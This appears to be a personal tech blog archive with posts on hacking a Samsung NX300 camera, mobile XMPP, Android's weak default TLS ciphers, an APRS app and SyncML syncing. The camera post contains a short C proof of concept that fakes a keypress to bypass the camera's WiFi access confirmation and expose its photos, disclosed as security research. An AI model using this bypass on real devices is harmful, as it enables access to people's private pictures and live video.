A short investigation using xev outlines that the physical keys on the camera body are bound to X11 key events as follows:

On/Off XF86PowerOff (only when turning off)
Scroll Wheel XF86ScrollUp / XF86ScrollDown
Direct Link XF86Mail
Mode Wheel F1 .. F10
Video Rec XF86WebCam
+/- XF86Reload
Menu Menu
Fn XF86HomePage
Keypad KP_Left .. KP_Down, KP_Enter
Play XF86Tools
Delete KP_Delete

WiFi Client: Firmware Update Check

When the camera goes online, it performs a firmware version check. First, it retrieves


GET / HTTP/1.1
Content-Type: text/xml;charset=utf-8
Accept: application/x-shockwave-flash, application/, */*
Accept-Language: ko
User-Agent: Mozilla/4.0


HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content-Length: 7
Connection: keep-alive

200 OK

This really looks like a no-op. But maybe this is a backdoor to allow for remote code execution? Who knows...

Then, a query to returns an empty document, but has your location data (apparently obtained from the IP) in the headers:

X-ConnMan-Status: online
X-ConnMan-Client-IP: ###.###.##.###
X-ConnMan-Client-Address: ###.###.##.###
X-ConnMan-Client-Continent: EU
X-ConnMan-Client-Country: DE
X-ConnMan-Client-Region: ##
X-ConnMan-Client-City: ###### (my actual city)
X-ConnMan-Client-Latitude: ##.166698
X-ConnMan-Client-Longitude: ##.666700
X-ConnMan-Client-Timezone: Europe/Berlin

Wow! They know where I live! At least they do not transmit any unique identifiers with the query.

As the last step, the camera is asking for firmware versions and gets redirected to an XML document with the ChangeLog.

Known versions so far:

WiFi Access Point: UPnP/DLNA

Two of the on-camera apps (MobileLink, Remote Viewfinder) open an unencrypted access point named AP_SSC_NX300_0-XX:XX:XX (where XX:XX:XX is the device part of its MAC address). Fortunately, Samsung's engineers were smart and added a user confirmation dialog to the camera UI, to prevent remote abuse:

NX300 Access Confirmation

Unfortunately, this dialog is running on a wide-open X server, so all we need is to fake an KP_Return event (based on an example by bharathisubramanian), and we can connect with whichever client, stream a live video or download all the private pictures from the SD card, depending on the enabled mode:

#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/extensions/XTest.h>
#include <unistd.h>
/* Send Fake Key Event */
static void SendKey (Display * disp, KeySym keysym, KeySym modsym){
 KeyCode keycode = 0, modcode = 0;
 keycode = XKeysymToKeycode (disp, keysym);
 if (keycode == 0) return;
 XTestGrabControl (disp, True);
 /* Generate modkey press */
 if (modsym != 0) {
  modcode = XKeysymToKeycode(disp, modsym);
  XTestFakeKeyEvent (disp, modcode, True, 0);
 /* Generate regular key press and release */
 XTestFakeKeyEvent (disp, keycode, True, 0);
 XTestFakeKeyEvent (disp, keycode, False, 0); 

 /* Generate modkey release */
 if (modsym != 0)
  XTestFakeKeyEvent (disp, modcode, False, 0);

 XSync (disp, False);
 XTestGrabControl (disp, False);

/* Main Function */
int main (){
 Display *disp = XOpenDisplay (NULL);
 sleep (1);
 /* Send Return */
 SendKey (disp, XK_Return, 0);

DLNA Service: Remote Viewfinder

The DLNA service is exposing some camera features, which are queried and used by the Android app. The device's friendly name is [Camera]NX300, as can be queried via HTTP from http://nx300:7676/smp_2_:

  <manufacturer>Samsung Electronics</manufacturer>
  <modelDescription>Samsung Camera DMS</modelDescription>
  <serialNumber>20081113 Folderview</serialNumber>

Additional SOAP services are provided for changing settings like focus and flash (/smp_3_):

BrowseObjectID BrowseFlag Filter
StartingIndex RequestedCount SortCriteria
Result NumberReturned
TotalMatches UpdateID

Another service is available for picture / video streaming (/smp_4_):

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="" s:encodingStyle="">
    <u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">

After triggering the right commands, a live video stream should be available from http://nx300:7679/livestream.avi. However, a brief attempt to get some video with wget or mplayer failed.

Firmware "Source Code"

The "source code" package provided on Samsung's OSS Release Center is 834 MBytes compressed and mainly contains three copies of the rootfs image (400-500MB each), and then some scripts. The actual build root is hidden under the second paper sheet link in the "Announcements" column.

Also, there are Obamapics in TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO.

The project is built on an ancient version of Tizen, on which I am no expert. Somebody else needs to take this stuff apart, make a proper build environment, or port OpenWRT to it.

Comments on HN

Full series:

Posted 2014-05-07 18:45:42 Tags:

In a post from 2009 I described why XEP-0198: Stream Management is very important for mobile XMPP clients and which client and server applications support it. I have updated the post over the years with links to bug tracker issues and release notes to keep track of the (still rather sad) state of affairs. Short summary:

Servers supporting XEP-0198 with stream resumption: Prosody IM.

Clients supporting XEP-0198 with stream resumption: Gajim, yaxim.

Today, with the release of yaxim 0.8.7, the first mobile client actually supporting the specification is available! With there is also a public XMPP server (based on Prosody) specifically configured to easily integrate with yaxim.

Now is a good moment to recapitulate what we can get from this combination, and where the (mobile) XMPP community should be heading next.

So I have XEP-0198, am I good now?

Unfortunately, it is still not that easy. With XEP-0198, you can resume the previous session within some minutes after losing the TCP connection. While you are gone, the server will continue to display you as "online" to your contacts, because the session resumption is transparent to all parties.

However, if you have been gone for too long, it is better to inform your contacts about your absence by showing you as "offline". This is accomplished by destroying your session, making a later resumption impossible. It is a matter of server configuration how much time passes until that happens, and it is an important configuration trade-off. The longer you appear as "online" while actually being gone, the more frustration might accumulate in your buddy about your lack of reaction – on the other hand, if the session is terminated too early and your client reconnects right after that, all the state is gone!

Now what exactly happens to messages sent to you when the server destroys the session? In prosody, all messages pending since you disconnected are destroyed and error responses are sent back. This is perfectly legal as of XEP-0198, but a better solution would be to store them offline for later transmission.

However, offline storage is only useful if you are not connected with a different client at the same time. If you are, should the server redirect the messages to the other client? What if it already got them by means of carbon copies? How is your now-offline mobile client going to see that it missed something?

Even though XEP-0198 is a great step towards mobile messaging reliability, additional mechanisms need to be implemented to make XMPP really ready for mass-market usage (and users).

Entering Coverage Gaps

With XEP-0280: Message Carbons, all messages you send and receive on your desktop are automatically also copied to your mobile client, if it is online at that time. If you have a client like yaxim, that tries to stay online all the time and uses XEP-0198 to resume as fast as possible (on a typical 3G/WiFi change, this takes less than five seconds), you can have a completely synchronized message log on desktop and mobile.

However, if your smartphone is out of coverage for more than some minutes, the XEP-0198 session is destroyed, no message carbons are sent, and further messages are redirected to your desktop instead. When the mobile client finally reconnects, all it receives is suspicious silence.

XMPP was not designed for modern-day smartphone-based instant messaging. However, it is the best tool we have to counter the proprietary silo-based IM contenders like WhatsApp, Facebook Chat or Google Hangouts.

Therefore, we need to seek ways to provide the same (or a better) level of usability, without sacrificing the benefits of federation and open standards.

Message Synchronization

With XEP-0136: Message Archiving there is an arcane, properly over-engineered draft standard to allow a client to fetch collections of chat messages using a kind of version control system.

An easier, more modern approach is presented in XEP-0313: Message Archive Management (MAM). With MAM, it is much easier to synchronize the message log between a client and a server, as the server extends all messages sent to the client with an <archived> tag and an ID. Later it is easily possible to obtain all messages that arrived since then by issuing a query with the last known archive ID.

Now it is up to the client implementors to add support for MAM! So far, it has been implemented in the web-based OTalk client, more are to come probably.

End-to-End Encryption

In the light of last year's revelations, it should be clear to everybody that end-to-end encryption is an essential part of any modern IM suite. Unfortunately, XMPP is not there yet. The XMPP Ubiquitous Encryption Manifesto is a step into the right direction, enforcing encryption of client-to-server connections as well as server-to-server connections. However, more needs to be done to protect against malicious server operators and sniffing of direct client-to-client transmissions.

There is Off-The Record Messaging (OTR), which provides strong encryption for chat conversations, and at the same time ensures (cryptographic) deniability. Unfortunately, cryptographic deniability provably does not save your ass. The only conclusion from that debacle can be: do not save any logs. This imposes a strong conflict of interest on Android, where the doctrine is: save everything to SQLite in case the OOM killer comes after you.

The other issue with OTR over XMPP (which some claim is solved in protocol version 3) is managing multiple (parallel) logins. OTR needs to keep the state of a conversation (encryption keys, initialization vectors and the like). If your chat buddy suddenly changes from a mobile device to the PC, the OTR state machine is confused, because that PC does not know the latest state. The result is, your conversation degrades into a bidirectional flood of "Can't decrypt this" error messages. This can be solved by storing the OTR state per resource (a resource is the unique identifier for each client you use with your account). This fix must be incorporated into all clients, and such things tend to take time. Ask me about adding OTR to yaxim next year.

Oh, by the way. OTR also does not mix well with archiving or carbons!

There is of course also PGP, which also provides end-to-end encryption, but requires you to store your key on a mobile device (or have a separate key for it). PGP can be combined with all kinds of archiving/copying mechanisms, and you could even store the encrypted messages on your device, requiring an unlock whenever you open the conversation. But PGP is rather heavy-weight, and there is no easy key exchange mechanism (OTR excels here with the Socialist Millionaire approach).

Encrypted Media

And then there are lolcats1. The Internet was made for them. But the XMPP community kind-of missed the trend. There is XEP-0096: File Transfer and XEP-0166: Jingle to negotiate a data transmission between two clients. Both protocols allow to negotiate in-band or proxy-based data transfers without encryption. "In-band" means that your multimedia file is split into handy chunks of at most 64 kilobytes each, base64-encoded, and sent via your server (and your buddy's server), causing some significant processing overhead and possibly triggering rate limiting on the server. However, if you trust your server administrator(s), this is the most secure way to transmit a file in a standards-compliant way.

You could use PGP to manually encrypt the file, send it using one of the mentioned mechanisms, and let your buddy manually decrypt the file. Besides the usability implications (nobody will use this!), it is a great and secure approach.

But usability is a killer, and so of course there are some proposals for encrypted end-to-end communication.


The browser developers did it right with WebRTC. You can have an end-to-end encrypted video conference between two friggin' browsers! This must have rang some bells, and JSON is cool, so there was a proposal to stack JSON ontop of XMPP for end-to-end encryption. Obviously because security is not complicated enough on its own.

XMPP Extensions Graveyard

Then there are ESessions, a deferred XEP from 2007, and Jingle-XTLS, which didn't even make it into an XEP, but looks promising otherwise. Maybe somebody should implement it, just to see if it works.

Custom Extensions

In the OTR specification v3, there is an additional mechanism to exchange a key for symmetric data encryption. This can be used to encrypt a file transmission or stream, in a non-standard way.

This is leveraged by CryptoCat, which is known for its security. CryptoCat is splitting the file into chunks of 64511 bytes (I am sure this is completely reasonable for an algorithm working on 16-byte blocks, so it needs to be applied 4031.9375 times), with the intention to fit them into 64KB transmission units for in-band transmission. AES256 is used in CTR mode and the transmissions are secured by HMAC-SHA512.

In ChatSecure, the OTR key exchange is leveraged even further, stacking HTTP on top of OTR on top of XMPP messages (on top of TLS on top of TCP). This might allow for fast results and a high degree of (library) code reuse, but it makes the protocol hard to understand, and in-the-wild debugging even harder.

A completely different path is taken by Jitsi, where Jingle VoIP sessions are protected using the Zimmerman RTP encryption scheme. Unfortunately, this mechanism does not transfer to file exchange.

And then iOS...

All the above only works on devices where you can keep a permanent connection to an XMPP server. Unfortunately, there is a huge walled garden full of devices that fail this simple task2. On Apple iOS, background connections are killed after a short time, the app developer is "encouraged" to use Apple's Push Service instead to notify the user of incoming chat messages.

This feature is so bizarre, you can not even count on the OS to launch your app if a "ping" message is received, you need to send all the content you want displayed in the user notification as part of the push payload. That means that as an iOS IM app author you have the choice between sacrificing privacy (clear-text chat messages sent to Apple's "cloud") or usability (display the user an opaque message in the kind of "Somebody sent you a message with some content, tap here to open the chat app to learn more").

And to add insult to injury, this mechanism is inherently incompatible with XMPP. If you write an XMPP client, your users should have the free choice of servers. However, as a client developer you need to centrally register your app and your own server(s) for Apple's push service to work.

Therefore, the iOS XMPP clients divide into two groups. In the first group there are apps that do not use Apple Push, that maintain your privacy but silently close the connection if the phone screen is turned off or another app is opened.

In the second group, there are apps that use their own custom proxy server, to which they forward your XMPP credentials (yes, your user name and password! They better have good privacy ToS). That proxy server then connects to your XMPP server and forwards all incoming and outgoing messages between your server and the app. If the app is killed by the OS, the proxy sends notifications via Apple Push, ensuring transparent functionality. Unfortunately, your privacy falls by the wayside, leaving a trail of data both with the proxy operators and Apple.

So currently, iOS users wishing for XMPP have the choice between broken security and broken usability – well done, Apple! Fortunately, there is light at the end of the tunnel. The oncoming train is an XEP proposal for Push Notifications (slides with explanation). It aims at separating the XMPP client, server, and push service tasks. The goal is to allow an XMPP client developer to provide their own push service, which the client app can register with any XMPP server. After the client app is killed, the XMPP server will inform the push service about a new message, which in turn informs Apple's (or any other OS vendor's) cloud, which in turn sends a push message to the device, which the user then can use to re-start the app.

This chain reaction is not perfect, and it does not solve the message-content privacy issue inherent to cloud notifications, but it would be a significant step forward. Let us hope it will be specified and implemented soon!


So we have solved connection stability (except on iOS). We know how to tackle synchronization of the message backlogs between mobile and desktop clients. Client connections are encrypted using TLS in almost all cases, server-to-server connections will follow soon (GMail, I am looking at you!).

End-to-end encryption of individual messages is well-handled by OTR, once all clients switch to storing the encryption state per resource. Group chats are out of luck currently.

The next big thing is to create an XMPP standard extension for end-to-end encryption of streaming data (files and real-time), to properly evaluate its security properties, and to implement it into one, two and all the other clients. Ideally, this should also cover group chats and group file sharing (e.g. on top of XEP-0214: File Repository and Sharing plus XEP-0329: File Information Sharing).

If we can manage that, we can also convince all the users of WhatsApp, Facebook and Google Hangouts to switch to an open protocol that is ready for the challenges of 2014.

Comments on HN

  1. lolcats, porn, or whatever other kind of multimedia content you want transmitted from one place to another. For the sake of this discussion, streaming content is considered as "multimedia" as much as the transmission of image, video or other files. ↩

  2. the Apple fanboy will object that this is a feature and not a bug, because it prevents evil apps from eating the device battery in the background. I am sure it is a feature indeed – one intended to route all your IM traffic through an infinite loop. ↩

Posted 2014-01-30 18:20:29 Tags:


Android is using the combination of horribly broken RC4 and MD5 as the first default cipher on all SSL connections. This impacts all apps that did not care enough to change the list of enabled ciphers (i.e. almost all existing apps). This post investigates why RC4-MD5 is the default cipher, and why it replaced better ciphers which were in use prior to the Android 2.3 release in December 2010.


Some time ago, I was adding secure authentication to my APRSdroid app for Amateur Radio geolocation. While debugging its TLS handshake, I noticed that RC4-MD5 is leading the client's list of supported ciphers and thus wins the negotiation. As the task at hand was about authentication, not about secrecy, I did not care.

However, following speculations about what the NSA can decrypt, xnyhps' excellent post about XMPP clients (make sure to read the whole series) brought it into my focus again and I seriously asked myself what reasons led to it.

Status Quo Analysis

First, I fired up Wireshark, started yaxim on my Android 4.2.2 phone (CyanogenMod 10.1.3 on a Galaxy Nexus) and checked the Client Hello packet sent. Indeed, RC4-MD5 was first, followed by RC4-SHA1:


To quote from RFC 2246: "The CipherSuite list, passed from the client to the server in the client hello message, contains the combinations of cryptographic algorithms supported by the client in order of the client's preference (favorite choice first)." Thus, the server is encouraged to actually use RC4-MD5 if it is not explicitly forbidden by its configuration.

I crammed out my legacy devices and cross-checked Android 2.2.1 (CyanogenMod 6.1.0 on HTC Dream), 2.3.4 (Samsung original ROM on Galaxy SII) and 2.3.7 (CyanogenMod 7 on a Galaxy 5):

Android 2.2.1Android 2.3.4, 2.3.7Android 4.2.2, 4.3

As can be seen, Android 2.2.1 came with a set of AES256-SHA1 ciphers first, followed by 3DES and AES128. Android 2.3 significantly reduced the security by removing AES256 and putting the broken RC4-MD5 on the prominent first place, followed by the not-so-much-better RC4-SHA1.

Wait... What?

Yes, Android versions before 2.3 were using AES256 > 3DES > AES128 > RC4, and starting with 2.3 it was now: RC4 > AES128 > 3DES. Also, the recently broken MD5 suddenly became the favorite MAC (Update: MD5 in TLS is OK, as it is combining two different variants).

As Android 2.3 was released in late 2010, speculations about the NSA pouring money on Android developers to sabotage all of us poor users arose immediately. I needed to do something, so I wrote a minimal test program (APK, source) and single-stepped it to find the origin of the default cipher list.

It turned out to be in Android's libcore package, NativeCrypto.getDefaultCipherSuites() which returns a hardcoded String array starting with "SSL_RSA_WITH_RC4_128_MD5".

Diving Into the Android Source

Going back on that file's change history revealed interesting things, like the addition of TLS v1.1 and v1.2 and its almost immediate removal with a suspicious commit message (taking place between Android 4.0 and 4.1, possible reasoning), added support for Elliptic Curves and AES256 in Android 3.x, and finally the addition of our hardcoded string list sometime before Android 2.3:

 public static String[] getDefaultCipherSuites() {
-       int ssl_ctx = SSL_CTX_new();
-       String[] supportedCiphers = SSL_CTX_get_ciphers(ssl_ctx);
-       SSL_CTX_free(ssl_ctx);
-       return supportedCiphers;
+        return new String[] {
+            "SSL_RSA_WITH_RC4_128_MD5",
+            "SSL_RSA_WITH_RC4_128_SHA",
+            "TLS_RSA_WITH_AES_128_CBC_SHA",
+        };

The commit message tells us: We now have a default cipher suite list that is chose to match RI behavior and priority, not based on OpenSSLs default and priorities. Translated into English: before, we just used the list from OpenSSL (which was really good), now we make our own list... with blackjack! ...and hookers! with RC4! ...and MD5!

The test suite comes with another hint:

// Note these are added in priority order as defined by RI 6 documentation.

That RI 6 for sure has nothing to do with MI 6, but stands for Reference Implementation, the Sun (now Oracle) Java SDK version 6.

So what the fine Google engineers did to reduce our security was merely to copy what was there, defined by the inventors of Java!

Cipher Order in the Java Runtime

In the Java reference implementation, the code responsible for creating the cipher list is split into two files. First, a priority-ordered set of ciphers is constructed in the CipherSuite class:

// Definition of the CipherSuites that are enabled by default.
// They are listed in preference order, most preferred first.

add("SSL_RSA_WITH_RC4_128_MD5", 0x0004, --p, K_RSA, B_RC4_128, N);
add("SSL_RSA_WITH_RC4_128_SHA", 0x0005, --p, K_RSA, B_RC4_128, N);

Then, all enabled ciphers with sufficient priority are added to the list for CipherSuiteList.getDefault(). The cipher list has not experienced relevant changes since the initial import of Java 6 into Hg, when the OpenJDK was brought to life.

Going back in time reveals that even in the 1.4.0 JDK, the first one incorporating the JSEE extension for SSL/TLS, the list was more or less the same:

Java 1.4.0 (2002)Java 1.4.2_19, 1.5.0 (2004)Java 1.6 (2006)

The original list resembles the CipherSpec definition in RFC 2246 from 1999, sorted numerically with the NULL and 40-bit ciphers moved down. Somewhere between the first release and 1.4.2, DES was deprecated, TLS was added to the mix (bringing in AES) and MD5 was pushed in front of SHA1 (which makes one wonder why). After that, the only chage was the addition of TLS_EMPTY_RENEGOTIATION_INFO_SCSV, which is not a cipher but just an information token for the server.

Java 7 added Elliptic Curves and significantly improved the cipher list in 2011, but Android is based on JDK 6, making the effective default cipher list over 10 years old now.


The cipher order on the vast majority of Android devices was defined by Sun in 2002 and taken over into the Android project in 2010 as an attempt to improve compatibility. RC4 is considered problematic since 2001 (remember WEP?), MD5 was broken in 2009.

The change from the strong OpenSSL cipher list to a hardcoded one starting with weak ciphers is either a sign of horrible ignorance, security incompetence or a clever disguise for an NSA-influenced manipulation - you decide! (This was before BEAST made the other ciphers in TLS less secure in 2011 and RC4 gained momentum again)

All that notwithstanding, now is the time to get rid of RC4-MD5, in your applications as well as in the Android core! Call your representative on the Google board and let them know!

Appendix A: Making your app more secure

If your app is only ever making contact to your own server, feel free to choose the best cipher that fits into your CPU budget! Otherwise, it is hard to give generic advice for an app to support a wide variety of different servers without producing obscure connection errors.

Update: Server-Side Changes

The cipher priority order is defined by the client, but the server has the option to override it with its own. Server operators should read the excellent best practices document by SSLLabs.

Further resources for server admins:

Changing the client cipher list

For client developers, I am recycling the well-motivated browser cipher suite proposal written by Brian Smith at Mozilla, even though I share Bruce Schneier's scepticism on EC cryptography. The following is a subset of Brian's ciphers which are supported on Android 4.2.2, and the last three ciphers are named SSL_ instead of TLS_ (Warning: BEAST ahead!).

// put this in a place where it can be reused
static final String ENABLED_CIPHERS[] = {

// get a new socket from the factory
SSLSocket s = (SSLSocket)sslcontext.getSocketFactory().createSocket(host, port);
// IMPORTANT: set the cipher list before calling getSession(),
// startHandshake() or reading/writing on the socket!

Use TLS v1.2!

By default, TLS version 1.0 is used, and the more recent protocol versions are disabled. Some servers used to be broken when contacted using v1.2, so this approach seemed a good conservative choice over a year ago.

At least for XMPP, an attempt to enforce TLS v1.2 is being made. You can follow with your own app easily:

// put this in a place where it can be reused
static final String ENABLED_PROTOCOLS[] = {
        "TLSv1.2", "TLSv1.1", "TLSv1"

// put this right before setEnabledCipherSuites()!

Use NetCipher!

NetCipher is an Android library made by the Guardian Project to improve network security for mobile apps. It comes with a StrongTrustManager to do more thorough certificate checks, an independent Root CA store, and code to easily route your traffic through the Tor network using Orbot.

Use AndroidPinning!

AndroidPinning is another Android library, written by Moxie Marlinspike to allow pinning of server certificates, improving security against government-scale MitM attacks. Use this if your app is made to communicate with a specific server!

Use MemorizingTrustManager!

MemorizingTrustManager by yours truly is yet another Android library. It allows your app to ask the user if they want to trust a given self-signed/untrusted certificate, improving support for regular connections to private services. If you are writing an XMPP client or a private cloud sync app, use this!

Appendix B: Apps that do care

Android Browser

Checks of the default Android Browser revealed that at least until Android 2.3.7 the Browser was using the default cipher list of the OS, participating in the RC4 regression.

As of 4.2.2, the Browser comes with a longer, better, stronger cipher list:


Update: Surprisingly, the Android WebView class (tested on Android 4.0.4) is also using the better ciphers.

Update: Google Chrome

The Google Chrome browser (version 30.0.1599.82, 2013-10-11) serves the following list:


This one comes with AES256-GCM and SHA384! Good work, Google! Now please go and make these the default for the Android runtime!

Update: Firefox

Firefox Browser for Android (version 24.0 from F-Droid) comes with its own cipher suite as well. However, contrary to Chrome, it is missing the GCM ciphers to mitigate the BEAST attack.


My favorite pick from that list: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA.

Enabling TLSv1.2 does not change the cipher list. BEAST is mitigated in TLSv1.2, but the Lucky13 attack might still bite you.

Send In Your App!

If you have an Android app with a significant user base that has a better cipher list, let me know and I will add it to the list.

Further Reading

Posted 2013-10-14 19:06:48 Tags:


APRSdroid is an Amateur Radio geo-location (APRS) app for Android licensed under the GPL. It started as a Scala learning experience two years ago, and has become a nice auxiliary income since, despite being Open Source and offering free downloads from the homepage. However, using Scala was not always the easiest path to go.

Project history

In mid-December of 2009 a HAM radio friend asked me: "it can't be too hard to make an Android APRS app, can it?" and because there was none yet, I started pondering. On December 31rd, instead of having fun and alcohol, I made the first commit. January 1st, at 03:37 local time, the first placeholder release 0.2 was created.

Over the course of the next weeks I discovered step-by-step what I had encumbered myself with. APRS is a protocol with a long history of organic growth, firmware limitation workarounds, many different ways to say the same thing (at least four just for position reports), countless protocol amendments and, to add insult to injury, base-91 ASCII encoding.

There was no Java code available to abstract away the protocol and to allow me to keep my sanity. So I read the spec, implemented position encoding, re-read the spec, implemented HTTP and UDP sending code, read the amendments, re-re-re-read the spec, etc.

The first usable release became 0.4 from the end of January. Because APRSdroid always was a leisure time project, phases of activity alternated with idle phases, and the app slowly grew features through 2010.

In early 2011, one year into it, I decided it was high time to make the project pay for itself. Real APRS gear (radio transceivers with GPS and packet radio support) was expensive (on the order of US$500), and the app was not only easier to use but also grew more and more features (except for direct access to the amateur radio spectrum, which does not work well on cell phones).

For some time, I went underground (by omitting git push to github and only providing nightly builds to some friends) and worked on the code behind closed doors (there were no other people contributing source anyway).

On April 1st, I decided to fool the community a little, but was not taken too seriously. In the meantime I was polishing a 1.0 release for Android Market.

Income Report

On April 18th, 2011, APRSdroid 1.0 was "commercially" launched to Android Market. It was important for me to keep up the OSS spirit, so I kept providing source code and APK files from the home page. By buying the app instead of just downloading it, the users got automatic updates and a good feeling of supporting what they liked. Also, I did not make it too obvious in the Market description that the app can be downloaded for free as well ;-)

So far, this scheme has paid off very well. Since the beginning, more than 60% of all app users actually bought it (it is possible to monitor the global user activity on the APRS network), with an average of 350 sales per month, at 2.99€ / 4.49US$ (minus the Google "tax" and subject to local income taxes).

Most users I had contact with were ready to pay for the app even though they knew they could download it for free. Only one person so far demanded the free version to be made available on Android Market (using CAPS and three consecutive Twitter messages, though, so I did not feel too pressed).

So far, I invested the income into real APRS hardware, a Desire Z (or G2 or HTC Vision) and am eagerly awaiting the availability of ICS tablets, aiming at finally adding Fragments support to the app.

Scala + Android = Pitfalls

I decided to use Scala because I do my coding in vim and Java is so crammed up with boilerplate code that you can not sensibly use it with anything but a bloated refactoring IDE. Another reason was that I do not like to repeat myself, and Java provides even less usable abstractions than the good old C language with its #define.

Scala was the language of the day, and I liked what I had read about it so far. It sounded good enough for an experiment anyways. Fortunately, people had already figured out how to make it work on Android without carrying the bloat of the full Scala runtime, so all I had to do were some refinements of build.xml.

The first warning sign was that I had to override def $tag() to work around an issue in the 2.7 beta compiler (IIRC). I complied by cargo-cult-copying the code from some place and moved on.

Another major issue was Android's AsyncTask. The API requires the developer to override protected SomeType doInBackground(OtherType... params). Unfortunately, Scala has trouble with overriding abstract varargs methods from Java, and thus your app crashes with the opaque java.lang.AbstractMethodError: abstract method not implemented exception. After triangulating the source of the problem (who would have suspected a compiler bug?), a wrapper class in Java was written. Another bunch of days well spent.

One of my biggest hopes in Scala was to be able to reduce the boilerplate for Android's numerous single-abstract-method function parameter workarounds. Unfortunately, this problem is not yet solved in Scala, requiring to write explicit implicit conversion functions for each SAM type.

However, not everything was bad in Scala-land. Scala's traits allowed to reuse the same code in descendants of Android's Activity, ListActivity and MapActivity. Working string comparisons, type based match and a huge amount of syntactic sugar, added on top of a proper ctags config, actually made life good.

Further, the base-91 decoding was elegantly implemented as a map/reduce operation on the ASCII string. Other interesting solutions were: an UrlOpener for buttons and regex based packet matching (Warning: please do not try to understand the regexes!).

What remains in the end is build time (compilation + proguard), which is subjectively higher for the Scala app than for a Java-only project of comparable size. However, that might be due to a bug in my build.xml and so far I was not impatient enough to investigate.


After two years, I am really glad to have gone this way. Learning Scala was a very pleasant experience, and it improved my ability to see problems from different points of view. However, it also significantly restricted the number of people able to contribute. Of over 500 commits to APRSdroid, only three were by another developer. The APRS parsing code has been replaced by javAPRSlib, a Java library with major contributions from several other people.

APRSdroid remains my only Scala project. My other Android projects are written in Java, either because I did not want to restrict contributors, or because I did not expect the Java code to become complex enough.

Would I start a new Scala project on Android? Probably no, as it is already hard enough to find people who would like to contribute to your pet project if it is written in Java. Scala makes that almost impossible.

Would I contribute to an existing Scala project? Yes!

P.S: Starting around March 2012, I will be looking for Android/IT-Sec related freelance jobs. Check github and Android Market for my other projects.

Posted 2011-12-29 19:10:55 Tags:

My love hate aversion to SyncML

Some years ago, I accidentally managed to synchronize my Nokia E65 phone to Evolution using Bluetooth, OpenSync packages from a custom repository, a huge amount of patience and a blood sacrifice to the gods of bloated binary XML protocols.

Unfortunately, soon after that my file system crashed, I reinstalled Debian and the magic setup was forever gone. Whatever I tried, all I got were opaque error messages. After many months of moot efforts, I finally gave up the transfer of events onto my phone and of phone numbers onto my PC. Sigh.

It was only last autumn that I dared challenging my luck again. After setting up a new colo box (it is serving this blog article right now) and having upgraded my Android toy-phone to an Android 2.x firmware, it was time to get my data from the good old Nokia phone to the Android device. Somehow.

The Quest of SyncML, part 1: eGroupWare

I began my quest by simply installing the current version of eGroupWare from the Debian Backports repository. Unfortunately, this version (1.6.002) is flawed with regard to SyncML. It worked partially with my cell phone, and failed miserably with Evolution.

After several days of fruitless efforts, I found a set of SyncML patches for eGroupWare written by Jörg Lehrke, which are already integrated into 1.6.003. Fortunately, is offering Debian 5.0 packages as well. I just added the following line to my /etc/apt/sources.list and installed the new version:

deb ./

Do not forget to import the repository key as well:

wget -O - | apt-key add -

With the shiny new eGroupWare, I only needed to wipe my previous synchronization efforts and to enable the SyncML application for the Default user group. Et voila, I could access my new RPC server at https://<servername>/egroupware/rpc.php

Part 2: Evolution

This step does work more or less properly, an official HOWTO is available. The only thing I have not automated yet is the fact of synchronization. It still requires manually running

syncevolution <servername>

Update, 2011-05-15: If you are running debian, do not use it's default packages. After my last dist-upgrade (sid), syncevolution thought it was a good idea to parse its plaintext config files, generate an XML-based config and throw it up on me due to strange parser errors.

Uninstalling syncevolution* and using the syncevolution-evolution package from

deb unstable main

solved my troubles however.

Part 3: Nokia E65

Fortunately, Nokia already includes a SyncML client with their smartphones. It is almost trivial to set up following the official howto. However, with eGroupWare 1.6.003, I could set the SyncML version to 1.2 to obtain the full contacts information.

Fortunately, it was also very easy to add the CAcert root certificate to the Nokia device, allowing end-to-end encryption of my sensitive personal data.

Part 4: Android

Now, the real fun began. Android comes preinstalled with a well-working synchronization service which is pushing all your data to Google servers. Not that I would mind Google having the data, I just wanted to be able to snapshot my contacts and calendar whenever I need to.

There are as well clients for other synchronization protocols. ActiveSync is supported out-of-the-box (and there is the GPL'ed Z-Push ActiveSync server); Funambol and Synthesis implement SyncML on Android.

Because I already had SyncML running and Funambol is Open-Source and looked generally promising, I started my work with it. However, the Android client is "optimized" for interacting with the Funambol server (read: it interoperates with other implementations only by chance).

Besides the hell imposed on the unlucky ones trying to compile android-client for themselves instead of using the Market version, there were various compatibility issues. In addition to that, SSL verification is only possible using the certificates already stored in the system. Neither self-signed nor community-signed SSL connections are possible.

If you have root permissions, there is a workaround to add CAcert:

# adb pull /system/etc/security/cacerts.bks .
# keytool -keystore cacerts.bks -storetype BKS -provider org.bouncycastle.jce.provider.BouncyCastleProvider -storepass changeit -import -v -trustcacerts -alias cacert_org_class_3 -file cacert_class3.crt 
Certificate was added to keystore
[Storing cacerts.bks]
# adb remount
remount succeeded
# adb push cacerts.bks /system/etc/security/cacerts.bks

Nevertheless, the experience was so frustrating that I started my own project to improve SSL certificate management on Android.

After many fruitless attempts at getting reproducible synchronization with Funambol's Android client, I decided to test Synthesis. It installed, allowed me to bypass SSL certificate checking (which is not quite perfect, but at least better than no SSL at all) and synced all my contacts at first attempt. Wow! Considering the time I have put into Funambol, paying 18€ for a Synthesis license really looks inexpensive in hindsight.

However, not everything is as shiny as it looks at first. It seems, Synthesis is not providing its own calendar backend. Instead, it is using whatever is available on the device. My device however seems to be lacking any calendar providers, unless I install the Funambol client. So all in all, I am using Synthesis to synchronize events to the Funambol calendar because Funambol fails at it. Funny, isn't it?

Update: After upgrading eGroupWare to 1.8.001, I can actually synchronize my events to my Android using Funambol. Because they change much more often than my contacts, I might actually stick to this software for some more time without buying Synthesis...

Update, 2011-05-15: I finally found the "bug" responsible for my lack of contacts synchronization. I happened to have a contact with an "&" sign, which was transmitted verbatim by eGroupWare, freaking out the Funambol parser. After renaming the contact, life suddenly became great passable!


SyncML is a friggin' huge pile of shi bloat. Just sync your devices to Google and your experience will be great.

Posted 2011-01-09 22:57:59 Tags: